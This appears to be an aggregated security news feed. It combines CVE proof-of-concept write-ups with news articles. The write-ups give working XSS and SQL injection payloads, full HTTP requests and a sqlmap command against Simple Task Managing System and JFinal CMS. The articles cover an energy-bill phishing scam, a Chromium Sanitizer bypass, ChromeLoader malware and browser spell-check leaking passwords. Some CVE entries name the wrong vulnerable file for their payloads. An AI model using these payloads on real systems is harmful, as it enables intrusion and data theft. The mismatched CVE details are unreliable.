Multiple Authenticated (custom specific plugin role) Persistent Cross-Site Scripting (XSS) vulnerability in Awesome Support plugin <= 6.0.7 at WordPress.

CVE-2022-38073: Awesome Support – WordPress HelpDesk & Support Plugin

Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin <= 3.6.7 at WordPress.

CVE-2022-36386: Import any XML or CSV File to WordPress

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newProjectValidation.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fullName parameter.

**Simple Task Managing System - XSS2**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newProjectValidation.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newProjectValidation.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/newProjectValidation.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $full can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40028: CVE_HUNTER/2022-09-01-XSS2.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newTask.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the shortName parameter.

**Simple Task Managing System - XSS**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newTask.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newTask.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $shortName can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40027: CVE_HUNTER/2022-09-01-XSS1.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a SQL injection vulnerability via the bookId parameter at board.php.

**Simple Task Managing System - SQL injection**

Simple Task Managing System v1.0 exists to contain a SQL injection vulnerability via the bookId parameter at /board.php

username:admin password:admin ----> {ip}/board.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has SQL injection

Payload: http://localhost:80/cve/Task Managing System in PHP/board.php?sn=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'='MkOa

SQL injection because $shortName can be closed

**Payload**

GET http://localhost:80/cve/Task Managing System in PHP/board.php?sn\=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'\='MkOa HTTP/1.1
Host: localhost
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40026: CVE_HUNTER/2022-09-01-SQL1.md at main · xidaner/CVE_HUNTER

Categories: News
Tags: scam

Tags:  phish

Tags:  SMS

Tags:  energy

Tags:  fake

Tags:  website

Tags:  £400

Watch out for an energy-themed scam being sent out via SMS which plays on energy price fears.



(Read more...)




The post Scammers send fake 'Energy Bills Support Scheme' texts appeared first on Malwarebytes Labs.

Watch out for an energy-themed scam being sent out via SMS. The message plays on energy price fears, similar to what we’ve seen previously.

> Scam alert. I just received this text. Click through and it looks very official. It’s a scam. The £400 energy bill discount is automatic, you don’t need to register or share any details with anyone. Please be aware. pic.twitter.com/76bT9YSkOy
> 
> — Marc Ashdown (@marcashdown) September 20, 2022

It reads as follows:

_GOVUK: We have identified you as eligible for a discounted energy bill under the Energy Bills Support Scheme. You can apply here \[URL\]_

The message, which claims to be from the UK government, directs clickers to a phishing page which resembles a typical gov.uk website.

> _Energy Bills Support Scheme_
> 
> _Register now to receive a £400 non-repayable discount under the Energy Bills Support Scheme._

Anyone “registering” to the website may well find themselves out of pocket. Considering those most likely to respond to such a message may be people already struggling financially, this is a particularly despicable attack.

**Phishing for info**

The pattern followed by this site is typical of this kind of attack. First it asks potential victims to enter a variety of personal information:

*   Name
    
*   Date of birth
    
*   Phone number
    
*   Address
    
*   City
    
*   Postcode
    

Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills.

The site eventually asks for:

*   Card number
*   Card expiry date
*   Card security code

It also places the logo of whichever company you’ve selected at the top of the page, along with the following message:

_This should be the account linked to your \[business name\] account. This is the account your supplier will send the payments to._

It’s worth noting that the URL is already being flagged by some browsers. For example, Chrome will make you confirm that you want to visit the site, ignoring its prominent “this site is bogus” warning. If you actually visit the page despite this, it’s also tagged as “Dangerous” where the green padlock in the URL bar is located. Users of Malwarebytes are protected from the phishing URL used in this attack.

**How to avoid energy scams**

*   Phone calls, emails, and random SMS messages asking for payment information are not going to be legitimate. You should also never be asked for login details for your online banking or other accounts from a cold-caller.
*   If you receive an unexpected call about energy prices or rebates, insist on calling "them" back on their official number taken from an official website directly. If the caller objects to this, that's an immediate red flag. A genuine caller would have no possible reason to object to this.
*   Bogus fake energy company websites are very popular and easy to set up. Visit the official website listed in official correspondence only, and pay close attention to URLs sent to you by text or email. Don’t trust sites sent your way in relation to any money back, discount, or rebate offer.

Scammers send fake 'Energy Bills Support Scheme' texts

Issue highlights the challenges of preventing client-side attacks

Issue highlights the challenges of preventing client-side attacks

  

A prototype pollution bug in the Chromium project allowed attackers to bypass Sanitizer API, a built-in browser library for removing potentially malicious code from user-controlled input sources.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

Reported by security researcher Michał Bentkowski, the bug highlights the challenges of preventing client-side prototype pollution attacks.

**Client-side prototype pollution**

Prototype pollution can happen both on the client side (browser) and server side (Node.js servers). Bentkowski, who has done extensive research on the topic, discovered the new bug while exploring client-side prototype pollution vulnerabilities in Chromium.

The Sanitizer API was added to Chromium browsers to support native sanitization as a replacement for third-party libraries such as DOMPurify.

According to Bentkowski’s findings, if the JavaScript object Sanitizer is instantiated with an empty object as argument, it will trigger an internal mechanism that bypasses the sanitization flow. Bentkowski told The Daily Swig that the empty object causes the browser “to traverse the prototype chain”.

BACKGROUND Prototype pollution: The dangerous and underrated flaw impacting JavaScript applications

As proof of concept, Bentkowski showed that the API misses sanitizing a JavaScript snippet embedded in an SVG object. Once the supposedly sanitized SVG is inserted into the page, the JavaScript code is executed.

In his report, Bentkowski notes that for the vulnerability to work, the browser’s must be enabled.

“My guess is that there’s a low amount of people with this flag enabled,” Bentkowski said. “However, the Sanitizer API is enabled by default in Chrome 105 (released at the end of August), so the impacted user base is now greater.”

**Bug or feature?**

The discussion thread on the Chromium bug tracker shows some of the complexities of drawing the boundaries on prototype pollution bugs. Manipulating prototypes is one of the features that make JavaScript flexible and versatile, which means that hardening applications against prototype pollution attacks will always require meticulous efforts by web developers.

As one security researcher noted in the discussion thread, the prototype pollution vector is not something that should be addressed in Sanitizer API.

“Environments that have their Object prototypes polluted are already compromised, and I don’t think selectively hardening chosen web APIs against that would offer much practical benefit, and it may only offer a false sense of security, at the expense of API cognitive complexity,” the researcher wrote.

“Before reporting the bug I was unaware that there exists a WebIDL spec that specifically defines that the prototype chain must be traversed by Web APIs,” Bentkowski said.

“This means that in fact, it is a feature, and this cannot be changed right now because that would be backward-incompatible; that is, many applications would be broken.”

Developers, therefore, need to identify and remove all gadgets that pollute prototypes from user-controlled sources.

Nonetheless, Bentkowski’s discovery did result in some fixes. “\[The bug\] only worked on the SVG example. In the end, this was the real bug in the submission,” he said.

“Prototype pollution by itself was considered a ‘feature’. However, it shouldn’t have been possible to bypass the Sanitizer by the specially constructed configuration object.”

DON’T MISS Uber hack linked to hardcoded secrets spotted in PowerShell script

Prototype pollution bug in Chromium bypassed Sanitizer API

Microsoft and VMware are warning that the malware, which first surfaced as a browser-hijacking credential stealer, is now being used to drop ransomware, steal data, and crash systems at enterprises.

Security researchers are sounding the alarm on the malware tool dubbed ChromeLoader. It first surfaced in January as a consumer-focused, browser-hijacking credential stealer but has now evolved into a widely prevalent and multifaceted threat to organizations across multiple industries.

In an advisory released Sept. 19, researchers from VMware's Carbon Black managed detection and response team said they have recently observed the malware being used to also drop ransomware, steal sensitive data, and deploy so-called decompression (or zip) bombs to crash systems.

The researchers said they have observed hundreds of attacks involving newer versions of the malware targeting enterprises in business services, education, government, healthcare, and multiple other sectors. 

"This campaign has gone through many changes over the past few months, and we don’t expect it to stop," the researchers warned. "It is imperative that these industries take note of the prevalence of this \[threat\] and prepare to respond to it."

**Ongoing & Prevalent Campaign**

VMware's warning echoed one from Microsoft's Security Intelligence team Friday about a threat actor they are tracking as DEV-0796, which is using ChromeLoader in an extensive and ongoing click-fraud campaign. In a series of tweets, the researchers said the cyberattackers were attempting to monetize clicks generated by a browser extension or browser node-webkit that ChromeLoader had secretly downloaded on numerous user devices.

"This campaign begins with an .ISO file that's downloaded when a user clicks malicious ads or YouTube comments," according to Microsoft's analysis. When opened, the .ISO file installs the aforementioned browser node-webkit (NW.js) or a browser extension. 

"We’ve also seen the use of DMG files, indicating multi-platform activity," Microsoft researchers added.

ChromeLoader (aka ChromeBack or Choziosi Loader) grabbed attention in January when researchers observed malware operators using it to drop a malicious browser extension as a payload on user systems. The malware targeted users who visited sites touting cracked video games and pirated torrents. 

Researchers from Palo Alto Networks' Unit 42 threat hunting team described the infection vector as starting with a user scanning a QR code on those sites with the intention of downloading pirated content. The QR code redirected the user to a compromised website, where they were persuaded to download an .ISO image purporting to be the pirated file, which contained an installer file and several other hidden ones.

When users launched the installer file, they received a message indicating that the download had failed — while in the background a PowerShell script in the malware downloaded a malicious Chrome extension on the user's browser, Unit 42 researchers found.

**Rapid Evolution**

Since arriving on the scene earlier this year, the malware's authors have released multiple versions, many of them equipped with different malicious capabilities. One of them is a variant called Bloom.exe that made its initial appearance in March and has since infected at least 50 VMware Carbon Black customers. VMware's researchers said they observed the malware being used to exfiltrate sensitive data from infected systems. 

Another ChromeLoader variant is being used to drop zip bombs on user systems, i.e. malicious archive files. Users who click on the weaponized compression files end up launching malware that overloads their systems with data and crashes them. And since August, the operators of the appropriately named CrashLoader variant have been using the malware to distribute a ransomware family called Enigma.

**ChromeLoader's Updated Malicious Tactics**

Along with the payloads, the tactics for getting users to download ChromeLoader have also evolved. For instance, VMware Carbon Black researchers said they have seen the malware's author's impersonating various legitimate services to lead users to ChromeLoader. 

One service they have impersonated is OpenSubtitles, a site designed to help users to find subtitles for popular TV shows and movies, VMware said in its report. Another is FLB Music Play, a site for playing music. 

"The impersonated software is used in conjunction with an adware program that redirects web traffic, steals credentials, and recommends other malicious downloads posed as legitimate updates," VMware said.

Often, consumers are the primary targets of malware such as ChromeLoader. But with many employees now working from home, and often using their personally owned devices to access enterprise data and applications, enterprises can end up being impacted as well. VMware's Carbon Black team, like Microsoft's security researchers, said they believe the current campaign is only a harbinger of more attacks involving ChromeLoader.  

"The Carbon Black MDR team believes this is an emerging threat that needs to be tracked and taken seriously," VMware said in its advisory, "due to its potential for delivering more nefarious malware."

ChromeLoader Malware Evolves into Prevalent, More Dangerous Cyber Threat

It's called "spell-jacking": Both browsers have spell-check features that send data to Microsoft and Google when users fill out forms for websites or Web services.

Spell-checking features present in both the Google Chrome and Microsoft Edge browsers are leaking sensitive user information — including username, email, and passwords — to Google and Microsoft, respectively, when people fill in forms on popular websites and cloud-based enterprise apps.  

The issue — dubbed "spell-jacking" by researchers at client-side security firm Otto JavaScript Security (Otto-js) — can expose personally identifiable information (PII) from some of the most widely used enterprise applications, including Alibaba, Amazon Web Services, Google Cloud, LastPass, and Office 365, according to a blog post published Sept. 16.

Otto-js co-founder and CTO Josh Summit discovered the leakage — which occurs specifically when Chrome's Enhanced Spellcheck and Edge's MS Editor are enabled on browsers —  
while conducting research on how browsers leak data in general.

Summit found that these spell-check features send data to Google and Microsoft that's entered into form fields — such as username, email, date of birth, and Social Security number — when someone fills out these forms on websites or Web services while using the browsers, the researchers said.

Chrome and Edge also will leak user passwords if the "show password" feature is clicked when someone enters a password into a site or service, sending that data to Google and Microsoft's third-party servers, they said.

**Where the Privacy Risk Lies**

Otto-js researchers, who posted a video on YouTube demonstrating how the leakage occurs, tested more than 50 websites that people use daily or weekly that have access to PII. They broke 30 of those into a control group spanning six categories — online banking, cloud office tools, healthcare, government, social media, and e-commerce — and selected websites for each category based on the top ranking in each industry.

Of the 30 control group websites tested, 96.7% sent data with PII back to Google and Microsoft, while 73% sent passwords when "show password" was clicked. Moreover, the ones that did not send passwords had not actually mitigated the issue; they just lacked the "show password" feature, the researchers said.

Of the websites that the researchers investigated, Google is the only one that already had fixed the issue for email and some services. Otto-js found that the company's Web service Google Cloud Secret Manager remains vulnerable, however.

Meanwhile, Auth0, a popular single sign-on service, was not in the control group that the researchers had investigated but was the only website other than Google that had correctly mitigated the issue, they said.

Google's Enhanced spell-check feature, which requires an opt-in from the user, handles the data in an anonymized way, according to a Google spokesperson.

"The text typed by the user may be sensitive personal information and Google does not attach it to any user identity and only processes it on the server temporarily," he tells Dark Reading. "To further ensure user privacy, we will be working to exclude passwords proactively from spell check. We appreciate the collaboration with the security community, and we are always looking for ways to better protect user privacy and sensitive information."

Users of a number of enterprise cloud-based applications also are at risk when entering forms while using the apps on Chrome and Edge if the spell-check features are enabled. Of those aforementioned services, security teams from Amazon Web Services (AWS) and LastPass responded to Otto-js and already have remedied the issue, the researchers said.

**Where Does the Data Go?**

One big question that arises is what happens to the data once it's received by Google and Microsoft, which the researchers said they can't clearly answer.

At this point, no one knows if the data is being stored on the receiving end or, if this is the case, who is managing its security, the researchers noted. It's also not clear if the data is managed with the same level of security as known sensitive data such as passwords, or if it's being used by product teams as metadata for refining models, they said.

Either way, researchers observed that the issue once again raises the concern about technology companies such as Google and Microsoft having so much access to sensitive information about customers, employees, and companies, particularly when it comes to passwords.

"Passwords are meant to be a secret you share with the party you intended, and no one else," they wrote in the post. "A shared secret should be hashed and irreversible, but this feature violates a fundamental security principle of 'need-to-know' and could be considered a violation of privacy."

**Easily Overlooked Issue**

Moreover, the data leakage can be widespread for users or enterprises for a number of reasons, the researchers noted. One is that because the browser features that expose the data are actually helpful to users, they are likely to be turned on and exposing data without a user's knowledge.

"What's concerning is how easy these features are to enable and that most users will enable these features without really realizing what is happening in the background," Summit says.

The password exposure also occurs as an "unintended interaction" between browser spell-check and a website feature, making it something that might easily fly under the radar, notes Walter Hoehn, vice president of engineering at Otto-js

"The enhanced spell-checking features in Chrome and Edge offer a significant upgrade over the default dictionary-based methods," he says. "Likewise, websites that provide the option of displaying passwords in cleartext are more usable, especially for those with disabilities."

**Path of Mitigation**

Even if a website or service has not fixed the issue from its side, enterprises can mitigate the risk of sharing their customers' PII entered into forms by adding "spellcheck=false" to all input fields, although this could create problems for users, researchers acknowledged.

Alternatively, enterprises can just add the command only to form fields with sensitive data to remove the risk, or they could take away the "show password" feature in their forms, they said. This won't prevent spell-jacking, but it will prevent passwords from being sent, the researchers said.

Companies also can mitigate internal exposure of company-owned accounts by implementing endpoint security precautions that disable enhanced spellcheck features and limiting employees from installing unapproved browser extensions, according to Otto-JS.

Consumers can mitigate their own risk of having their data sent to Microsoft and Google without their knowledge by going into their browsers and disabling the respective spell-check culprits, the researchers added.

Spell-Checking in Google Chrome, Microsoft Edge Browsers Leaks Passwords

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

Tag

#chrome